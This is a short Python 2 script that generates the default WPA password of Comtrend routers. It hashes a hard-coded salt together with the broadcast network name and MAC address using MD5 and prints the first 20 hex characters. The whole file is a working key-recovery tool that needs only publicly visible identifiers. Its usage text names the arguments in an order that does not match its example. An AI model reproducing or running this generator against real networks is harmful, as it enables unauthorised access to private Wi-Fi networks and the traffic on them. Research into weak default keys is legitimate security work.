#!/usr/bin/env python

import sys
import hashlib

def fix_essid(essid):
    fixed = ''
    for c in essid:
        if c != ':':
            fixed += c.upper()
    return fixed

def calc_pass(bssid, essid):
    last_bssid = bssid[len(bssid)-4:len(bssid)]
    first_essid = essid[:-4]
    to_compute = 'bcgbghgg' + first_essid + last_bssid + essid
    md5 = hashlib.md5()
    md5.update(to_compute)
    md5sum = md5.hexdigest()
    return md5sum[0:20]

def usage():
    print 'Example of comtrend password generation algorithm by Int-0'
    print
    print 'Usage:'
    print '\t' + sys.argv[0] + ' <BSSID> <ESSID>'
    print
    print 'Example:'
    print '\t' + sys.argv[0] + ' WLAN_ABCD A1:B2_C3:D4:E5:06'
    print

if __name__ == '__main__':
    if (len(sys.argv) != 3):
        usage()
        sys.exit(1)
    print calc_pass(sys.argv[1], fix_essid(sys.argv[2]))
    sys.exit(0)
    
